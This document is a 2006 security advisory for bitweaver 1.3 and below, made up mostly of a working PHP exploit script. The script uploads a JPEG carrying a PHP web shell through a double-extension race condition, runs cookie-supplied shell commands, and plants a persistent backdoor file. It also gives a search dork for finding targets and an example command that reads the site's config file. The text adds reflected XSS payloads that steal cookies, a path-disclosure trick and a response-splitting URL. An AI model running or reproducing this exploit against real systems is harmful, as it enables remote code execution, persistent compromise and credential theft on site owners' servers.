bitweaver <= v1.3 multiple vulnerabilities Jun 17 2006 12:30AM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

// Banner, then the usage text when fewer than three positional arguments
// (host, path, cmd) were given. Output is CRLF-terminated like the rest of
// the script; the trailing empty element yields the closing blank line.
$banner = array(
    "bitweaver <= v1.3 'tmpImagePath' attachment mod_mime exploit",
    "by rgod rgod (at) autistici (dot) org [email concealed]",
    "site: http://retrogod.altervista.org",
    "dork: \"powered by bitweaver\"",
    "",
);
echo implode("\r\n", $banner) . "\r\n";

if ($argc < 4) {
    $usage = array(
        "Usage: php " . $argv[0] . " host path cmd OPTIONS",
        "host: target server (ip/hostname)",
        "path: path to bitweaver",
        "cmd: a shell command",
        "Options:",
        " -p[port]: specify a port other than 80",
        " -P[ip:port]: specify a proxy",
        "Examples:",
        "php " . $argv[0] . " localhost /bitweaver/ cat ./../../kernel/config_inc.php",
        "php " . $argv[0] . " localhost /bitweaver/ ls -la -p81",
        "php " . $argv[0] . " localhost / ls -la -P1.1.1.1:80",
        "",
    );
    echo implode("\r\n", $usage) . "\r\n";
    die;
}

/*

software site: http://www.bitweaver.org/articles/

i)

vulnerable code in articles/BitArticle.php near lines 456-478:

...

if( !empty( $_FILES['article_image']['name'] ) ) {

// store the image in temp/articles/

$tmpImagePath = TEMP_PKG_PATH.ARTICLES_PKG_NAME.'/'.'temp_'.$_FILES['article_image']['name'];

$tmpImageName = preg_replace( "/(.*)\..*?$/", "$1", $_FILES['article_image']['name'] );

if( !is_dir( TEMP_PKG_PATH.ARTICLES_PKG_NAME ) ) {

mkdir( TEMP_PKG_PATH.ARTICLES_PKG_NAME );

}

if( !move_uploaded_file( $_FILES['article_image']['tmp_name'], $tmpImagePath ) ) {

$this->mErrors['article_image'] = "Error during attachment of article image";

} else {

$resizeFunc = ( $gBitSystem->getPreference( 'image_processor' ) == 'imagick' ) ? 'liberty_imagick_resize_image' : 'liberty_gd_resize_image';

$pFileHash['source_file'] = $tmpImagePath;

$pFileHash['dest_path'] = TEMP_PKG_NAME.'/'.ARTICLES_PKG_NAME.'/';

// remove the extension

$pFileHash['dest_base_name'] = $tmpImageName;

$pFileHash['max_width'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;

$pFileHash['max_height'] = ARTICLE_TOPIC_THUMBNAIL_SIZE;

$pFileHash['type'] = $_FILES['article_image']['type'];

if( !( $resizeFunc( $pFileHash ) ) ) {

$this->mErrors[] = 'Error while resizing article image';

}

@unlink( $tmpImagePath );

...

explanation:

any remote user can go to:

http://[target]/[path]/articles/edit.php

to submit an article to the administrator, and can attach an image there (the exploit below sends no session cookie, so it relies on article submission being open to unauthenticated users).

You can submit a file like this, with double extension:

suntzu1234.php.xxx

a temporary copy of the file is created in the web-accessible temp/articles/ folder and renamed like this:

temp_suntzu1234.php.xxx

(see how $tmpImagePath is built above: 'temp_' is prepended to $_FILES['article_image']['name'] verbatim, so every extension the user chose survives - there is no extension whitelist and no randomised name)

you have about 0.1 / 0.2 seconds to launch commands :), because the temporary file is @unlink()ed right after the resize call: the race window is the time between move_uploaded_file() and that unlink. Inside it, request:

http://[target]/[path]/temp/articles/temp_suntzu1234.php.xxx?cmd=dir

this works fine on most Apache servers because mod_mime evaluates every extension of a multi-extension filename: where PHP is mapped with AddHandler/AddType, temp_x.php.xxx is still passed to the PHP handler even though .xxx, the last extension, is unknown to the server...

note: this folder is not properly protected. Its .htaccess only denies names that END in .php/.php3/.php4/.phtml (the $ anchor), so temp_x.php.xxx is not matched and gets executed. A fix is to drop the $ anchor so any .php segment is caught, or better to allow only the expected image extensions and keep temporary uploads outside the document root. The file looks like this:

<FilesMatch "\.ph(p(3|4)?|tml)$">

order deny,allow

deny from all

</FilesMatch>

ii) two reflected cross site scripting vulnerabilities (the error and feedback parameters are reflected into the page without HTML escaping):

http://[target]/[path_to_bitweaver]/users/login.php?error=<script>alert(document.cookie)</script>

http://[target]/[path_to_bitweaver]/articles/index.php?feedback=<script>alert(document.cookie)</script>

iii) a trick to see bitweaver's "white screen of death": an unexpected sort_mode value makes the page fail with a verbose error

http://[target]/[path_to_bitweaver]/users/index.php?sort_mode=suntzuuuuuuuuuuuuu

which discloses the full application path, the database table prefix and other details (the path disclosure is handy for the config_inc.php example above).

iv) several http response splitting vulnerabilities; in this one the BWSESSION value is apparently copied into a response header without CR/LF filtering, so arbitrary headers can be injected:

http://[target]/[path]/index.php?BWSESSION=%0d%0a[http headers]

this is the exploit for i). Besides running the command, the payload drops a persistent copy of the shell as temp/articles/suntzu.php.xxx the first time it executes (see the payload listed further down), and every later run of the script tries that file first; anyone cleaning up an affected install should look for it.

*/

// Run silently and with no script time limit; sockets give up after 5 seconds
// so a dead target does not stall the race loop below.
error_reporting(0);
foreach (array('max_execution_time' => 0, 'default_socket_timeout' => 5) as $option => $value) {
    ini_set($option, $value);
}

/**
 * Hex dump helper (unused by the exploit itself, kept for debugging).
 *
 * Returns the hex column followed by "\r\n" and the ASCII column. Each byte
 * becomes " xx" in the hex column and " c" in the ASCII column, with bytes
 * <= 0x20 or > 0x7e shown as " ."; both columns get a "\r\n" after every
 * 15 bytes.
 *
 * @param string $string  raw bytes to render
 * @return string         hex column . "\r\n" . ascii column
 */
function quick_dump($string)
{
    $hexColumn = '';
    $asciiColumn = '';
    $length = strlen($string);
    for ($pos = 0; $pos < $length; $pos++) {
        $byte = ord($string[$pos]);
        // controls, space, DEL and high bytes are not printable here
        $asciiColumn .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$pos];
        $hexColumn .= sprintf(' %02x', $byte);
        // wrap both columns every 15 bytes
        if (($pos + 1) % 15 === 0) {
            $hexColumn .= "\r\n";
            $asciiColumn .= "\r\n";
        }
    }
    return $hexColumn . "\r\n" . $asciiColumn;
}

// Loose sanity check for the -P option, "a.b.c.d:port" (the parentheses are
// the PCRE delimiters). It does not validate octet ranges and, because of the
// \b anchors, also matches the pattern embedded in a longer string; it only
// keeps obviously malformed input away from fsockopen().
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

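/**
 * Send one raw HTTP request and collect the whole response into the global
 * $html, either directly to $host:$port or through the -P proxy.
 *
 * @param string $packet  complete request (headers and body), CRLF terminated
 *
 * Globals read: $proxy, $host, $port, $proxy_regex. Global written: $html.
 * Terminates the script (die) when the connection cannot be opened or when
 * the proxy string does not look like ip:port.
 */
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;

    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port);
        if (!$ock) {
            echo 'No response from ' . $host . ':' . $port;
            die;
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...';
            die;
        }
        $parts = explode(':', $proxy);
        echo "Connecting to " . $parts[0] . ":" . $parts[1] . " proxy...\r\n";
        $ock = fsockopen($parts[0], $parts[1]);
        if (!$ock) {
            echo 'No response from proxy...';
            die;
        }
    }

    fputs($ock, $packet);

    $html = '';
    if ($proxy == '') {
        // Direct connection: read line by line until the server closes.
        while (!feof($ock)) {
            $html .= fgets($ock);
        }
    } else {
        // Proxy: read byte by byte until the peer closes and a blank line
        // (end of headers) has been seen. The original used eregi(), which
        // was removed in PHP 7; a literal CRLFCRLF needs no regex anyway.
        // The extra break avoids spinning forever on a proxy that closes
        // the socket (or times out) without ever sending a blank line.
        while (!feof($ock) || strpos($html, "\r\n\r\n") === false) {
            $byte = fread($ock, 1);
            if ($byte === '' || $byte === false) {
                if (feof($ock)) {
                    break;
                }
                continue;
            }
            $html .= $byte;
        }
    }
    fclose($ock);

    #debug
    #echo "\r\n".$html;
}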

/**
 * Derive an srand() seed from the wall clock: whole seconds plus the
 * fractional part scaled up, as a float. Predictable by design - it only
 * feeds the filename nonce used for the upload, nothing secret depends on it.
 *
 * @return float
 */
function make_seed()
{
    $now = explode(' ', microtime());   // "0.12345600 1150000000"
    $fraction = (float) $now[0];
    $seconds = (float) $now[1];
    return $seconds + $fraction * 100000;
}

// Positional arguments: target host (ip or name) and the web path to
// bitweaver, which must start and end with '/'.
$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";
// Everything from argv[3] on is part of the command, except -p<port> and
// -P<ip:port> options, which may appear anywhere. Command words are joined
// with a leading space each (" ls -la").
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1]; // first two characters of the argument
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
// The command travels in a Cookie header, so it must be URL-encoded.
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line must carry an absolute URL.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
// First try a backdoor left behind by a previous successful run (the payload
// writes temp/articles/suntzu.php.xxx). If it answers with the *delim*
// markers, print the command output and stop; otherwise fall through to the
// upload race below.
$packet="GET ".$p."temp/articles/suntzu.php.xxx HTTP/1.0\r\n";
$packet.="User-Agent: GoogleBot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"*delim*"))
{ echo "Exploit succeeded...\r\n";
$temp=explode("*delim*",$html);
die($temp[1]); // command output sits between the two *delim* markers
}

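// The uploaded "image". The listing on the mailing list was line-wrapped
// (every eighth chr() call was split into "ch" / "r(..)"), which made it a
// syntax error; the bytes are rebuilt here, segment by segment, from the
// same values.
//
// Layout: SOI, then a JPEG COM (0xFFFE) segment holding the PHP payload,
// then a minimal but structurally complete JPEG (APP0/JFIF, two quantisation
// tables, SOF0 for a 1x1 image, four Huffman tables, SOS, a few bytes of
// scan data, EOI). Presumably the JPEG framing exists so that the upload
// passes for an image during the resize step; the PHP handler, once the
// .php extension triggers it, simply echoes the binary bytes outside the
// <?php ... ?> tags and executes what is inside.
$payload = "<?php\r\n"
    . 'error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*";' . "\r\n"
    . '$fp=fopen("suntzu.php.xxx","w");' . "\r\n"
    . 'fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo \"*delim*\";passthru(\$_COOKIE[cmd]);echo \"*delim*\";?>");' . "\r\n"
    . 'fclose($fp);' . "\r\n"
    . 'chmod("suntzu.php.xxx",777);' . "\r\n"
    . '?>';

$shell = "\xff\xd8"                                                   // SOI
    . "\xff\xfe" . pack('n', strlen($payload) + 2) . $payload         // COM segment (length includes its own 2 bytes)
    . "\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00"  // APP0 / JFIF 1.1, 72x72 dpi, no thumbnail
    . "\xff\xdb\x00\x43\x00" . str_repeat("\x01", 64)                 // DQT, table 0
    . "\xff\xdb\x00\x43\x01" . str_repeat("\x01", 64)                 // DQT, table 1
    . "\xff\xc0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01" // SOF0: 8 bit, 1x1, 3 components
    . "\xff\xc4\x00\x14\x00\x01" . str_repeat("\x00", 15) . "\x08"    // DHT DC0
    . "\xff\xc4\x00\x14\x10\x01" . str_repeat("\x00", 15) . "\x00"    // DHT AC0
    . "\xff\xc4\x00\x15\x01\x01\x01" . str_repeat("\x00", 14) . "\x08\x09" // DHT DC1
    . "\xff\xc4\x00\x14\x11\x01" . str_repeat("\x00", 15) . "\x00"    // DHT AC1
    . "\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00"      // SOS, 3 components
    . "\x23\x94\x09\x2e"                                              // entropy-coded data
    . "\xff\xd9"                                                      // EOI
    . "\x00\x00";                                                     // trailing padding as in the original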

/*

this image carries the following PHP code in a JPEG COM (0xFFFE comment) segment placed right after the SOI marker, ahead of the JFIF APP0 header - not in EXIF (APP1). The JPEG framing keeps it parseable as an image, while the PHP handler, once triggered by the .php extension, echoes the binary bytes outside the <?php ... ?> tags and executes the code in between:

<?php

error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo "*delim*";passthru($_COOKIE[cmd]);echo "*delim*";

$fp=fopen("suntzu.php.xxx","w");

fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo \"*delim*\";passthru(\$_COOKIE[cmd]);echo \"*delim*\";?>");

fclose($fp);

chmod("suntzu.php.xxx",777);

?>

*/

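// Seed rand() and pick a per-run number so the uploaded filename is unique.
// rand() is fine here: the number only avoids collisions, it is not a secret.
srand(make_seed());
$anumber = rand(1,99999);

// Build the multipart/form-data body for articles/edit.php explicitly, with
// CRLF line ends as RFC 2046 requires, instead of relying on the newline
// convention of the source file (the mailing-list rendering also mangled the
// blank-line structure of the original literal). Field order and values
// mirror the original form post.
$boundary = '-----------------------------7d63b53760260';
$fields = array(
    'tk' => '',
    'article_id' => '',
    'preview_image_url' => '',
    'preview_image_path' => '',
    'title' => 'test',
    'author_name' => 'test',
    'article_type_id' => '1',
    'rating' => '3',
    'format_guid' => 'tikiwiki',
    'edit' => 'test',
    'preview' => 'Preview',
    'publishDateInput' => '1',
    'publish_Month' => '06',
    'publish_Day' => '15',
    'publish_Year' => '2006',
    'publish_Hour' => '22',
    'publish_Minute' => '33',
    'expireDateInput' => '1',
    'expire_Month' => '06',
    'expire_Day' => '15',
    'expire_Year' => '2007',
    'expire_Hour' => '22',
    'expire_Minute' => '33',
    'MAX_FILE_SIZE' => '1000000',
);
$data = '';
foreach ($fields as $name => $value) {
    $data .= $boundary . "\r\n"
        . 'Content-Disposition: form-data; name="' . $name . '"' . "\r\n\r\n"
        . $value . "\r\n";
}
// The file part. The double extension is the whole point (see the comment
// block at the top) and the Content-Type is deliberately left empty, as in
// the original post.
$data .= $boundary . "\r\n"
    . 'Content-Disposition: form-data; name="article_image"; filename="suntzu' . $anumber . '.php.xxx"' . "\r\n"
    . "Content-Type:\r\n\r\n"
    . $shell . "\r\n"
    . $boundary . "--\r\n";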

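// Upload request. $p already ends in '/', so no extra slash is inserted
// before "articles/edit.php" (the original produced "//articles/edit.php",
// inconsistent with the GET requests built elsewhere in the script).
$packet = "POST " . $p . "articles/edit.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://" . $host . $path . "articles/edit.php\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d63b53760260\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: GoogleBot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;

// The upload connection is opened by hand rather than through sendpacketii():
// we must not wait for the response, because the temp file only exists for a
// fraction of a second after the upload lands. The proxy string was already
// validated by the first probe above.
if ($proxy == "") {
    $ffpp = fsockopen($host, $port);
} else {
    $parts = explode(':', $proxy);
    $ffpp = fsockopen($parts[0], $parts[1]);
}
if (!$ffpp) {
    echo "Could not open the upload connection...";
    die;
}
fputs($ffpp, $packet); // we don't need output, quickly look for temporary file...

// Hammer the temp path while the upload is being processed (see the race
// window described in the comment block). The command travels in a cookie;
// a side effect is that it stays out of the request line in the access log.
$packet = "GET " . $p . "temp/articles/temp_suntzu" . $anumber . ".php.xxx HTTP/1.0\r\n";
$packet .= "User-Agent: GoogleBot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: cmd=" . $cmd . ";\r\n";
$packet .= "Connection: Close\r\n\r\n";

for ($i = 0; $i <= 99; $i++) {
    sendpacketii($packet);
    if (!strstr($html, "200 OK")) {
        continue; // not there yet, or already unlinked
    }
    echo "temp_suntzu" . $anumber . ".php.xxx file found...\r\n";
    if (strstr($html, "passthru")) {
        // The source came back verbatim: the server is not handing .php.xxx
        // to the PHP handler, so further attempts cannot succeed.
        echo "file served as plain text, not executed as php code...\r\n";
        break;
    }
    echo "Exploit succeeded...\r\n";
    $temp = explode("*delim*", $html);
    // command output sits between the two *delim* markers; fall back to the
    // raw response if the markers are missing
    die(isset($temp[1]) ? $temp[1] : $html);
}
fclose($ffpp);

// if you are here...
echo "Exploit failed...";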

?>

original url: http://retrogod.altervista.org/bitweaver_13_xpl.html
